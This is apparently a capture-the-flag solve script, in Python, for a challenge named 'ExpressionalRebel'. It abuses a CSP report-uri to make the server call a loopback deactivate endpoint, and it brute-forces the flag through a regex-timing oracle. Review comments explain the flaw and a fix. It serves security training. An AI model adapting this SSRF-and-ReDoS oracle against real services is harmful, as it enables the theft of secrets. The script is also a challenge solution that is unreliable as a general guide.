ExpressionalRebel

import requests, re, urllib.parse

# Loopback URL that ends up inside the CSP "report-uri" directive built in
# brute_force_flag(). "127.1" is the short form of 127.0.0.1, so the URL is only
# meaningful from the target host itself.
# NOTE(review): presumably the evaluate service fetches this URL server-side; confirm.
deactivate_endpoint = "http://127.1:1337/deactivate"

# Externally reachable endpoint that receives the "csp" form field.
# Replace the placeholder with the challenge instance's host and port.
eval_endpoint = "http://<YOUR_INDSTANCE_AND_PORT>/api/evaluate"

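def brute_force_flag():
    """Recover the flag one character at a time through a response-time oracle.

    Each request posts a CSP whose ``report-uri`` points at the loopback
    ``deactivate`` endpoint with ``secretCode`` set to
    ``<known prefix><candidate>`` followed by an alternation with a deliberately
    expensive pattern. A reply within the timeout is treated as "the cheap left
    side matched"; a timeout is treated as a miss.

    NOTE(review): this only works if the target uses ``secretCode`` as a regex
    pattern matched against the secret (inferred from the script, not shown
    here). The root cause is comparing a secret through a caller-supplied
    pattern; a plain constant-time equality check removes the oracle.

    Returns:
        None. Progress and the final guess are printed to stdout.
    """
    # A list, not a bare map(): a map iterator is exhausted after the first pass,
    # which left every later position with nothing to try.
    alphabet = [
        re.escape(c)
        for c in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789[]{}/\\!@#$%^&*()_+=-<>?"
    ]

    # The tail is a hard-to-compute regex. If the request takes longer than the
    # timeout, the right-hand side of the alternation is being evaluated, which
    # means the left side (prefix + candidate) did not match.
    regex = r".+|(?:[^<]+|<(?:[^\/]|\/(?:[^s])))*>(?:[^<]+|<(?:[^/]|\/(?:[^s]))*)"

    # current_guess accumulates the re.escape()d form of each character, so
    # punctuation is stored (and printed) with its escaping backslash.
    current_guess = "HTB{"
    while not current_guess.endswith("}"):
        for char in alphabet:
            # Current best guess + the character under test + the expensive tail.
            guess = current_guess + char + regex

            # secretCode has to be URL-safe inside the report-uri.
            u = deactivate_endpoint + "?secretCode=" + urllib.parse.quote(guess)
            data = {
                "csp": "report-uri " + u + ";"
            }
            try:
                requests.post(eval_endpoint, timeout=0.5, data=data)
            except requests.exceptions.Timeout:
                # requests has no TimeoutException attribute; Timeout is the
                # class raised when the deadline passes. A timeout is a miss.
                continue

            current_guess += char
            print(current_guess)
            # Restart from the top of the alphabet for the next position;
            # without this the remaining candidates were tested against the
            # already-extended prefix and earlier characters were never retried.
            break
        else:
            # Every candidate timed out (alphabet gap, or latency noise pushing
            # all replies past the timeout). Stop instead of spinning forever.
            print("no candidate matched; stopping")
            break

    print("final guess was " + current_guess)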
# Run the search only when executed as a script, not when imported.
if __name__ == "__main__":
    brute_force_flag()
Mohammed Amer